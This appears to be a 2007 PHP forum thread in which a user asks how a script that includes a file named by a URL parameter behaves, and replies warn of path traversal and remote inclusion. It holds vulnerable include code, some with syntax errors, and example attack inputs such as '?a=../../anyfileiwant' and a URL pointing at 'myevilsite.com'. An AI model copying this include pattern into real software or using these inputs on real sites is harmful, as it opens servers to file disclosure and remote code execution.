Page 1 of 2
A simple include script problem!
Posted: Sun Oct 07, 2007 3:33 pm
by glav
feyd | Please use Code: Select all
and [syntax="..."] tags where appropriate when posting code. Your post has been edited to reflect how we'd like it posted. Please read: [url=http://forums.devnetwork.net/viewtopic.php?t=21171]Posting Code in the Forums[/url] to learn how to do it too.[/color]
OK - I have a small problem but it's bugging me out.
The little script I'm using is
Code: Select all
<?php
if (@$a) {
include "".$a.".inc";
} else {
include "".main.".inc";
}
?>
First of all and I think I should ask these questions one at a time and get the answer for the fists one before asking the second.
Thats for my own benifit, so I don't get confused.
Question 1: In this script if the value for $a does not exist does the script then load main.php or does it only load main.php when the variable is not pass.
What I mean is this:
http://www.sitename.com/index.php?a=nosuchfile
Does main.php load
OR
http://www.sitename.com/index.php
Only loads when the variable is not passed.
Or does it load for both cases.
Thanks
feyd | Please use Code: Select all
and [syntax="..."] tags where appropriate when posting code. Your post has been edited to reflect how we'd like it posted. Please read: [url=http://forums.devnetwork.net/viewtopic.php?t=21171]Posting Code in the Forums[/url] to learn how to do it too.[/color]
Posted: Sun Oct 07, 2007 3:36 pm
by feyd
There's a thread linked from Useful Posts you need to read regarding this type of code.
Posted: Sun Oct 07, 2007 3:39 pm
by Zoxive
Whats the the error suppression?
Code: Select all
if(!empty($_GET['a'])){
// $_GET['a'] Also Should be Filtered/Escaped/Checked
include($_GET['a'] . '.inc'); // Edit: Forgot `.`
}else{
include('main.inc');
}
Posted: Sun Oct 07, 2007 3:47 pm
by glav
Zoxive, I tried that and got the error.
Warning: main(jetlagphp) [function.main]: failed to open stream:
the '.' is missing
so I put it in and tried to call a page that does not exist and I got this error
Warning: main(jetlag2.php) [function.main]: failed to open stream:
and yes the extension I use is .php not .inc
Thanks
Posted: Sun Oct 07, 2007 3:55 pm
by Zoxive
glav wrote:Zoxive, I tried that and got the error.
Warning: main(jetlagphp) [function.main]: failed to open stream:
the '.' is missing
so I put it in and tried to call a page that does not exist and I got this error
Warning: main(jetlag2.php) [function.main]: failed to open stream:
and yes the extension I use is .php not .inc
Thanks
Well, you need to do more Checking.
Right now it is only seeing if the Variable $_GET['a'] exists, and then it tries and includes.
Code: Select all
$Ext = '.php';
// I would like to note again..
// $_GET['a'] Also Should be Filtered/Escaped/Checked
if(!empty($_GET['a']) && file_exists($_GET['a'] . $Ext){
include($_GET['a'] . $Ext);
}else{
include('main.inc');
}
If i go to your site, i could easily put sitename.com/index.php?a=../../anyfileiwant
Posted: Sun Oct 07, 2007 4:19 pm
by glav
Zoxive, first of all the '.' was not missing, it was my mistake.
When I try the new piece of code you wrote it only loads the main.php page even if the value for a exist.
Thanks for the help.
Posted: Sun Oct 07, 2007 4:23 pm
by feyd
Have you read the thread I referred to in the first response?
Posted: Sun Oct 07, 2007 4:26 pm
by glav
feyd, i'm readin it at the moment.
Ok I’ve finished reading that, some snaky posts there, lots of fun.
Did it help, yes a little but I'll have to read a little more before I understand everything that was mentioned.
Thanks
Posted: Sun Oct 07, 2007 6:45 pm
by glav
OK Zoxive & feyd, I figured out why this was not working for me. I am using this on a new site that is based around a premade app that I wanted to use. When I tried your script Zoxive it did the same thing my own version did and when I tried on a site with out the premade app it worked fine. The reason was becasue I had to put the location in the file_exists function like this:
Code: Select all
$Ext = '.php';
// I would like to note again..
// $_GET['a'] Also Should be Filtered/Escaped/Checked
if(!empty($_GET['a']) && file_exists("template/hhi/"$_GET['a'] . $Ext){
include($_GET['a'] . $Ext);
}else{
include('main.inc');
}
This was because the index.php file was in wwwroot/or/ and the value's for $a where in wwwroot/or/template/hhi/
What I need to figure out is how to load the premade app into the wwwroot/ dir and load the $a values from there also.
Thanks for the help.
Posted: Sun Oct 07, 2007 6:48 pm
by Zoxive
I have yet acquired the ability to read minds. And know exactly how your structure of your website is to give you exact code.
On a serious note, we are here to help you learn, give advice and point you in the right direction. So when you get code examples here (IF you do, i was feeling generous today) most of the time you still need to tweak them to your apps.
Posted: Mon Oct 08, 2007 5:39 am
by glav
Even though I have read the thread feyd forwarded me to Im still a little confused about what steps I should use to secure the include method.
I need to make sure that the files are in a certain folders only and that a hacker can not enter in index.php?a=../../../somefile
Would this be enough or am i prone to an easy attack still.
Thanks
Posted: Mon Oct 08, 2007 11:50 am
by RobertGonzalez
Read that thread carefully. There are a lot of security topics covered in there, all of which you should use when allowing dynamic includes from user input.
Posted: Mon Oct 08, 2007 2:46 pm
by mrkite
even worse, make sure a hacker can't say index.php?a=
http://myevilsite.com/blah.txt
because php will download blah.txt and execute the php code in it as if it were running locally.
I find it easiest to just do:
Code: Select all
$_GET['a']=preg_replace('|/|','',$_GET['a']);
Which should prevent people from passing paths or urls to your include statement.
Posted: Mon Oct 08, 2007 3:08 pm
by RobertGonzalez
The safest way would be to not allow users to tell your application which page to include directly.
Posted: Mon Oct 08, 2007 3:09 pm
by s.dot
A much more elegant solution would use
file_exists() on the include file. An even more elegant solution wouldn't pass the filename via $_GET, but instead perhaps a number which indicates a specific file.